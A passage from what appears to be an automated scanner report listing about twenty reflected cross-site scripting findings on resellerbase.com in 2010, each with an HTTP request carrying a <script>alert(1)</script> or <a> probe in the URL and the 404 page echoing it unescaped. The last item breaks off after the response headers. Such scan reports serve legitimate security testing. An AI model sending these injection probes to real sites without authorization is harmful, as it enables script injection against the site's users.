2.1391. http://www.resellerbase.com/detail/17/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3bdc<script>alert(1)</script>519c1bdcce4d5f346 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17/rating.php/f3bdc<script>alert(1)</script>519c1bdcce4d5f346?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php/f3bdc<script>alert(1)</script>519c1bdcce4d5f346?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1392. http://www.resellerbase.com/detail/17/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a14a<script>alert(1)</script>ddefffada1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/rating.php?3a14a<script>alert(1)</script>ddefffada1d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php?3a14a<script>alert(1)</script>ddefffada1d=1 was not found on this server.</p>
...[SNIP]...

2.1393. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>3830c86065 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf3298<script>alert(1)</script>3830c86065/17/resellerclub-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf3298<script>alert(1)</script>3830c86065/17/resellerclub-com.html was not found on this server.</p>
...[SNIP]...

2.1394. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25de7<a>2e54469a0c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1725de7<a>2e54469a0c9/resellerclub-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1725de7<a>2e54469a0c9/resellerclub-com.html was not found on this server.</p>
...[SNIP]...

2.1395. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb6b6<script>alert(1)</script>a65421b25d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/bb6b6<script>alert(1)</script>a65421b25d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/bb6b6<script>alert(1)</script>a65421b25d9 was not found on this server.</p>
...[SNIP]...

2.1396. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 568db<script>alert(1)</script>511c549b8b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail568db<script>alert(1)</script>511c549b8b3/17/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail568db<script>alert(1)</script>511c549b8b3/17/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1397. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a641<script>alert(1)</script>0ab71411ac7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/171a641<script>alert(1)</script>0ab71411ac7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/171a641<script>alert(1)</script>0ab71411ac7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1398. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74bad<script>alert(1)</script>3658693c195 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/search.php74bad<script>alert(1)</script>3658693c195?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php74bad<script>alert(1)</script>3658693c195?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1399. http://www.resellerbase.com/detail/17/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ed731<a>38258453aef was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Searched731<a>38258453aef&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Searched731<a>38258453aef&opt=2 was not found on this server.</p>
...[SNIP]...

2.1400. http://www.resellerbase.com/detail/17/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7b55c<a>2a9c82df34e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...7b55c<a>2a9c82df34e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...7b55c<a>2a9c82df34e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1401. http://www.resellerbase.com/detail/17/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f630<script>alert(1)</script>dcf4176d4a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2&2f630<script>alert(1)</script>dcf4176d4a9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Search&opt=2&2f630<script>alert(1)</script>dcf4176d4a9=1 was not found on this server.</p>
...[SNIP]...

2.1402. http://www.resellerbase.com/detail/17/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ac5f8<a>56f6b83a287 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2ac5f8<a>56f6b83a287 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Search&opt=2ac5f8<a>56f6b83a287 was not found on this server.</p>
...[SNIP]...

2.1403. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9c6a<script>alert(1)</script>5daf130daab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila9c6a<script>alert(1)</script>5daf130daab/17/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila9c6a<script>alert(1)</script>5daf130daab/17/themes/ was not found on this server.</p>
...[SNIP]...

2.1404. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6bb7b<script>alert(1)</script>33dd4edb171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/176bb7b<script>alert(1)</script>33dd4edb171/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/176bb7b<script>alert(1)</script>33dd4edb171/themes/ was not found on this server.</p>
...[SNIP]...

2.1405. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a173<script>alert(1)</script>d043bc89fb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes7a173<script>alert(1)</script>d043bc89fb1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes7a173<script>alert(1)</script>d043bc89fb1/ was not found on this server.</p>
...[SNIP]...

2.1406. http://www.resellerbase.com/detail/17/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c46f1<script>alert(1)</script>ead07f6afe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/?c46f1<script>alert(1)</script>ead07f6afe7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/?c46f1<script>alert(1)</script>ead07f6afe7=1 was not found on this server.</p>
...[SNIP]...

2.1407. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33fb4<script>alert(1)</script>798697828c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail33fb4<script>alert(1)</script>798697828c1/17/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail33fb4<script>alert(1)</script>798697828c1/17/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1408. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4861f<script>alert(1)</script>c57cf5704db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/174861f<script>alert(1)</script>c57cf5704db/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/174861f<script>alert(1)</script>c57cf5704db/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1409. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc323<script>alert(1)</script>1e25ad72a73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesdc323<script>alert(1)</script>1e25ad72a73/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesdc323<script>alert(1)</script>1e25ad72a73/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1410. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4c91<script>alert(1)</script>ff818d033ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmosf4c91<script>alert(1)</script>ff818d033ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

